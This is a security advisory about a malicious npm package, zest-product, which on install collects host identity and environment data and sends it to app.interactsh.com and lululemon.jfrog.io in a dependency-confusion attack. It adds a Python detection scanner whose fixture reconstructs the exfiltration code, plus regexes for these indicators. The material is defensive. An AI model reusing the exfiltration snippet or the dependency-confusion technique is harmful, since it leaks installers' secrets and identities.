
MAL-2026-4738

Malicious code in zest-product (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c9081ad708b658c1bd56299e401ca6a764cc9137d99573bc922d38a7381cc30d)

On `npm install`, postinstall.js collects host identity and environment data (os.hostname(), username, process.cwd(), process.env values, plus shelled-out `whoami`/`hostname`/`id` via child_process.execSync) and ships it over the network. Outbound destinations include `https://app.interactsh.com` (an out-of-band interaction service commonly used for blind-exfiltration / SSRF beacons) and `http://lululemon.jfrog.io` (a JFrog endpoint referenced by hardcoded URL, consistent with a dependency-confusion attack targeting Lululemon's internal package namespace). Collected data is base64-encoded (Buffer.from(...).toString('base64')) before transmission via https.request.

index.js additionally constructs a `curl -X POST` command interpolating `$(whoami)`, `$(hostname)`, and `id` and runs it via child_process.exec. The `99.9.0` version number combined with the lululemon.jfrog.io reference is the canonical dependency-confusion fingerprint: publish a public package with a name matching an internal one and a high version to win resolution.

Installer harm: identity, environment variables, working-directory contents, and internal-network reachability data are leaked to attacker-controlled infrastructure on every install.
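As an added defender-side example (not part of this advisory or its source data), a small Python scanner that flags the indicators described above: an install-time lifecycle hook, an implausibly inflated version, and host-data collection combined with network egress. The package metadata and script text are constructed fixtures modelled on the description, and the version threshold is an assumed heuristic.

```python
import re

# Constructed fixtures modelled on the advisory text (not the real package contents).
SAMPLE_PACKAGE_JSON = {
    "name": "zest-product",
    "version": "99.9.0",
    "scripts": {"postinstall": "node postinstall.js"},
}
SAMPLE_POSTINSTALL = """
const os = require('os');
const { execSync } = require('child_process');
const https = require('https');
const info = { host: os.hostname(), cwd: process.cwd(), env: process.env };
info.who = execSync('whoami').toString();
const body = Buffer.from(JSON.stringify(info)).toString('base64');
https.request({ hostname: 'app.interactsh.com', method: 'POST' }) /* ... */
"""

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# One regex per indicator class named in the advisory; each is a heuristic, not proof.
COLLECT = re.compile(r"os\.hostname\(|os\.userInfo\(|process\.env\b|process\.cwd\(")
SHELL = re.compile(r"child_process|exec(?:Sync)?\(\s*['\"`]\s*(?:whoami|hostname|id)\b")
ENCODE = re.compile(r"toString\(\s*['\"]base64['\"]\s*\)")
EGRESS = re.compile(r"https?\.request\(|\bfetch\(|\bcurl\s+-X\s+POST")
OOB = re.compile(r"interactsh\.com|\.jfrog\.io")
HIGH_MAJOR = 50  # assumed threshold for an inflated major version (99.9.0 on this page)

def scan_package(pkg, script_src):
    """Return (severity, findings) for one npm package version and its install script."""
    findings = []
    hooks = [h for h in INSTALL_HOOKS if h in pkg.get("scripts", {})]
    if hooks:
        findings.append("install-time hook: " + ", ".join(hooks))
    major = int(pkg.get("version", "0").split(".")[0] or 0)
    if major >= HIGH_MAJOR:
        findings.append(f"inflated version {pkg['version']} (dependency-confusion pattern)")
    for label, rx in (("host-identity collection", COLLECT),
                      ("shelled-out recon command", SHELL),
                      ("base64 encoding of payload", ENCODE),
                      ("network egress", EGRESS),
                      ("out-of-band or private-registry host", OOB)):
        if rx.search(script_src):
            findings.append(label)
    # Collection plus egress from an install hook is the exfiltration shape itself.
    if hooks and COLLECT.search(script_src) and EGRESS.search(script_src):
        return "high", findings
    return ("medium" if findings else "clean"), findings
```

A package with only a lifecycle hook (for example a native build step) scores medium, so the hook alone is a review prompt rather than a verdict.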


Affected packages

npm / zest-product

No fixed version published yet for zest-product (npm). Pin to a known-safe version or switch to an alternative.
